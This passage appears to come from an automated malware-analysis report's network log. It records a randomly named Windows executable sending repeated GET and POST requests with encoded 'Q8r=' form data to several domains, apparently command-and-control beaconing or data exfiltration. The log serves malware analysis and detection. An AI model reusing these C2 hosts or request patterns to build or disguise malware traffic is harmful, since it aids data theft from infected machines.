                                                        Nov 4, 2024 10:13:25.325371981 CET462OUTGET /0zsv/?Q8r=+k4oqFxRNocWibNOARfqv4VMC58QqhlZUZKcqPt4OXzeqjQirtEo6xCQlowbpjBKI3NLMSWGXVvwuRLD6mLhdQvHcmrKXdi5xtD9EO55lWtqmLshJCc1gWo=&6trpq=anQT3n HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Host: www.deepfy.xyz
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Nov 4, 2024 10:13:26.300266027 CET1236INHTTP/1.1 200 OK
                                                        date: Mon, 04 Nov 2024 09:13:26 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1438
                                                        x-request-id: b922dcf3-2491-471d-a33c-2b8e81a65714
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AKkWSBgxD2Iz8oXBz2Drwtj1aroxrEMja0JtnAm9V33pcR8o6z0uF8LLqvhoti69nLYN7yvprYdp99PJbX/4aw==
                                                        set-cookie: parking_session=b922dcf3-2491-471d-a33c-2b8e81a65714; expires=Mon, 04 Nov 2024 09:28:26 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 4b 6b 57 53 42 67 78 44 32 49 7a 38 6f 58 42 7a 32 44 72 77 74 6a 31 61 72 6f 78 72 45 4d 6a 61 30 4a 74 6e 41 6d 39 56 33 33 70 63 52 38 6f 36 7a 30 75 46 38 4c 4c 71 76 68 6f 74 69 36 39 6e 4c 59 4e 37 79 76 70 72 59 64 70 39 39 50 4a 62 58 2f 34 61 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AKkWSBgxD2Iz8oXBz2Drwtj1aroxrEMja0JtnAm9V33pcR8o6z0uF8LLqvhoti69nLYN7yvprYdp99PJbX/4aw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                        Nov 4, 2024 10:13:26.300355911 CET891INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjkyMmRjZjMtMjQ5MS00NzFkLWEzM2MtMmI4ZTgxYTY1NzE0IiwicGFnZV90aW1lIjoxNzMwNzExNj


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.450043217.160.0.111805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:31.497531891 CET741OUTPOST /tc13/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.time-change.fyi
                                                        Origin: http://www.time-change.fyi
                                                        Content-Length: 200
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.time-change.fyi/tc13/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 66 45 7a 7a 2f 72 74 53 77 37 64 50 6c 51 78 76 61 6f 34 44 72 41 46 50 53 77 4c 65 44 45 48 42 45 71 72 67 54 79 58 64 4b 6a 4a 35 72 72 39 51 45 31 4a 55 4b 6c 78 33 67 69 65 73 6e 41 4e 35 30 63 38 31 2b 63 41 65 46 4e 76 34 63 66 67 6f 52 72 47 6d 73 32 79 65 36 78 41 39 68 30 78 79 6c 4f 64 61 7a 38 34 61 65 48 6c 43 6d 6f 4e 4e 4e 39 6e 70 4b 45 61 42 36 4a 54 75 65 6f 64 30 36 62 74 45 6b 62 43 67 6d 52 4f 70 30 64 47 71 61 50 37 47 77 2f 64 41 4b 2b 71 59 56 52 6f 71 78 7a 6f 75 4a 6f 38 64 50 47 74 6c 42 6f 71 69 73 32 69 6a 71 46 51 45 35 73 65 63 4c 30 38 58 6d 67 3d 3d
                                                        Data Ascii: Q8r=fEzz/rtSw7dPlQxvao4DrAFPSwLeDEHBEqrgTyXdKjJ5rr9QE1JUKlx3giesnAN50c81+cAeFNv4cfgoRrGms2ye6xA9h0xylOdaz84aeHlCmoNNN9npKEaB6JTueod06btEkbCgmROp0dGqaP7Gw/dAK+qYVRoqxzouJo8dPGtlBoqis2ijqFQE5secL08Xmg==
                                                        Nov 4, 2024 10:13:32.334312916 CET779INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Date: Mon, 04 Nov 2024 09:13:32 GMT
                                                        Server: Apache
                                                        X-Frame-Options: deny
                                                        Content-Encoding: gzip
                                                        Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                        Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.450044217.160.0.111805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:34.051765919 CET761OUTPOST /tc13/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.time-change.fyi
                                                        Origin: http://www.time-change.fyi
                                                        Content-Length: 220
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.time-change.fyi/tc13/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 66 45 7a 7a 2f 72 74 53 77 37 64 50 6d 77 68 76 64 4a 34 44 74 67 46 49 52 77 4c 65 4e 6b 48 46 45 71 58 67 54 7a 54 4e 4b 58 6c 35 6f 4b 4e 51 46 78 39 55 5a 56 78 33 72 43 65 31 70 67 4d 37 30 64 42 41 2b 64 73 65 46 4e 37 34 63 66 77 6f 52 34 75 70 2b 57 79 63 79 52 41 7a 2f 45 78 79 6c 4f 64 61 7a 39 63 38 65 47 4e 43 36 4a 39 4e 50 5a 54 71 48 6b 61 43 79 70 54 75 61 6f 64 34 36 62 74 71 6b 65 6a 4e 6d 58 43 70 30 63 32 71 64 65 37 46 37 2f 64 38 46 65 72 34 55 55 64 49 7a 6d 45 6b 50 4c 70 39 45 48 78 67 41 75 6e 34 39 48 44 30 34 46 30 33 6b 72 58 6f 47 33 42 65 39 67 64 69 4d 62 55 71 47 32 6a 75 6a 6b 50 4e 4d 43 38 61 59 53 63 3d
                                                        Data Ascii: Q8r=fEzz/rtSw7dPmwhvdJ4DtgFIRwLeNkHFEqXgTzTNKXl5oKNQFx9UZVx3rCe1pgM70dBA+dseFN74cfwoR4up+WycyRAz/ExylOdaz9c8eGNC6J9NPZTqHkaCypTuaod46btqkejNmXCp0c2qde7F7/d8Fer4UUdIzmEkPLp9EHxgAun49HD04F03krXoG3Be9gdiMbUqG2jujkPNMC8aYSc=
                                                        Nov 4, 2024 10:13:34.922955990 CET779INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Date: Mon, 04 Nov 2024 09:13:34 GMT
                                                        Server: Apache
                                                        X-Frame-Options: deny
                                                        Content-Encoding: gzip
                                                        Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                        Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.450045217.160.0.111805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:36.595967054 CET10843OUTPOST /tc13/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.time-change.fyi
                                                        Origin: http://www.time-change.fyi
                                                        Content-Length: 10300
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.time-change.fyi/tc13/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 66 45 7a 7a 2f 72 74 53 77 37 64 50 6d 77 68 76 64 4a 34 44 74 67 46 49 52 77 4c 65 4e 6b 48 46 45 71 58 67 54 7a 54 4e 4b 57 78 35 6f 34 46 51 45 57 68 55 61 56 78 33 33 53 65 77 70 67 4d 36 30 63 70 45 2b 64 77 6b 46 4c 2f 34 65 38 6f 6f 47 35 75 70 31 57 79 63 2b 78 41 79 68 30 78 6a 6c 4f 4e 65 7a 38 73 38 65 47 4e 43 36 4c 6c 4e 47 74 6e 71 55 55 61 42 36 4a 53 76 65 6f 63 6e 36 66 42 63 6b 65 75 77 6d 6e 69 70 30 38 6d 71 59 73 44 46 34 66 64 45 47 65 72 61 55 55 5a 2b 7a 69 6c 62 50 4b 73 71 45 48 56 67 43 6f 47 55 6f 6e 62 58 76 44 77 54 35 38 2b 50 48 6b 38 59 31 33 56 37 61 4a 46 79 63 57 66 63 6d 6d 57 64 64 53 77 6e 46 46 64 51 47 4b 37 41 43 62 4c 4a 76 51 46 6d 6f 39 35 43 30 79 44 78 47 31 4a 42 79 78 47 34 33 5a 36 55 2b 31 76 38 6b 2f 41 63 33 30 6b 69 4e 30 50 49 44 58 33 74 45 30 63 54 6e 57 63 77 50 49 6d 6e 38 43 54 35 63 31 4c 69 45 37 76 42 47 71 30 4f 62 34 4d 76 4b 74 38 34 74 39 77 6e 76 4e 75 58 39 4b 38 74 30 64 5a 43 2f 47 47 57 62 45 56 35 62 66 6c 41 59 33 [TRUNCATED]
                                                        Data Ascii: Q8r=fEzz/rtSw7dPmwhvdJ4DtgFIRwLeNkHFEqXgTzTNKWx5o4FQEWhUaVx33SewpgM60cpE+dwkFL/4e8ooG5up1Wyc+xAyh0xjlONez8s8eGNC6LlNGtnqUUaB6JSveocn6fBckeuwmnip08mqYsDF4fdEGeraUUZ+zilbPKsqEHVgCoGUonbXvDwT58+PHk8Y13V7aJFycWfcmmWddSwnFFdQGK7ACbLJvQFmo95C0yDxG1JByxG43Z6U+1v8k/Ac30kiN0PIDX3tE0cTnWcwPImn8CT5c1LiE7vBGq0Ob4MvKt84t9wnvNuX9K8t0dZC/GGWbEV5bflAY37Ud62kceM+4i67beY6SyY/PIdUO0mRPao2qjJZtygKLpjTtMXa6Rke/7wXmnk0dV/RvkaqSrNu8KXckmoDvgYPY5IH7awGwGIGNkyrECYmDHe4n3dHf5lpEJJrkuE1/JNIiu92cWFk85JFTArhwR7dc+P3x2PBFPPiDFGG07pfrdt1bF7DhSf2CdqGpAgU6em3XCir1zn8mP6S2Gjfo5k9MYj8WkBA+wyEbWLtZjp6hApgpEEwsXL0eXiSOL0hjZjETy2c8QZpitN7LB1LFZoJWgsWePlHDif/iBbaKDpr77j4hIXncFWxTP5Oz1ZWho2k/HU6L/ObfF/aNXv0l0hMA0XpYtH8DwlCcZ/HS+EZONtnLwytGU9eJCBWkYWkrBH5QnAt3tYLdlf7qGeIVSJ1YiDGlfWDSA5WRClS/om4+abKDaJXIpm2Rr5OWz8z55UbmRr7IcI1dcCaSPG0hVr0QH6A/+wrXod15+2mJROQ17DnJsWnAMccuUFwUUqlgUCx9kwHhH9lcBOPNzV0UNT9G4sUMjPxR3Hx2+o21Fj4Xy1QF3wtgi/DGJSzlI/j8UfmMCR9keSFEwBIF2rdmE+JhxnP2Tvzy+B51sQCBNWF6qELDWimKybETs/xChw1AL5e/xinlRYbpk+F4YPXjfW3CQ9L3ex/HCOd [TRUNCATED]
                                                        Nov 4, 2024 10:13:37.431473017 CET779INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Date: Mon, 04 Nov 2024 09:13:37 GMT
                                                        Server: Apache
                                                        X-Frame-Options: deny
                                                        Content-Encoding: gzip
                                                        Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                        Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.450046217.160.0.111805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:39.139338970 CET467OUTGET /tc13/?Q8r=SGbT8cdGn4hr6W9IQaErgA0XZ0/ODBbeE+rRSQfNCBVGsaJUOBN6Lk8UowuO+R8+qu85kOdeeMLFTNx1Fuyr7ECi1xcpiA8ny7JQ29NqIXoz/KZuCpX8Llg=&6trpq=anQT3n HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Host: www.time-change.fyi
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Nov 4, 2024 10:13:39.985613108 CET1236INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html
                                                        Content-Length: 1271
                                                        Connection: close
                                                        Date: Mon, 04 Nov 2024 09:13:39 GMT
                                                        Server: Apache
                                                        X-Frame-Options: deny
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                        Nov 4, 2024 10:13:39.985734940 CET203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
                                                        Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.450047168.76.221.252805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:45.625785112 CET738OUTPOST /lxjv/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.5hdgb2p9a.buzz
                                                        Origin: http://www.5hdgb2p9a.buzz
                                                        Content-Length: 200
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.5hdgb2p9a.buzz/lxjv/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 7a 49 52 48 38 38 37 57 38 6a 42 34 50 62 4b 78 6c 6b 48 36 30 42 67 6a 4d 38 73 50 6f 4f 45 41 69 41 4d 67 41 51 45 79 2b 4b 47 67 6d 4e 42 6a 72 67 4a 71 67 58 48 70 2b 4a 41 34 53 50 42 59 41 6f 6d 52 56 47 66 62 6b 52 79 59 6c 2f 57 69 39 73 44 66 67 49 31 63 44 56 32 38 6d 38 75 5a 67 73 6a 6a 30 44 6c 51 53 75 51 6d 64 61 52 38 6e 37 77 39 75 42 51 59 62 34 6a 36 44 79 46 6f 50 75 58 62 4c 38 37 68 61 31 31 54 6f 62 4f 68 2f 4d 4e 4b 4d 63 31 70 32 48 79 4e 38 2f 46 71 73 2f 66 6b 43 7a 52 62 56 45 55 5a 45 50 46 64 6a 34 70 65 2f 45 48 70 6e 72 50 72 67 49 7a 65 35 77 3d 3d
                                                        Data Ascii: Q8r=zIRH887W8jB4PbKxlkH60BgjM8sPoOEAiAMgAQEy+KGgmNBjrgJqgXHp+JA4SPBYAomRVGfbkRyYl/Wi9sDfgI1cDV28m8uZgsjj0DlQSuQmdaR8n7w9uBQYb4j6DyFoPuXbL87ha11TobOh/MNKMc1p2HyN8/Fqs/fkCzRbVEUZEPFdj4pe/EHpnrPrgIze5w==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.450048168.76.221.252805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:48.176172018 CET758OUTPOST /lxjv/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.5hdgb2p9a.buzz
                                                        Origin: http://www.5hdgb2p9a.buzz
                                                        Content-Length: 220
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.5hdgb2p9a.buzz/lxjv/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
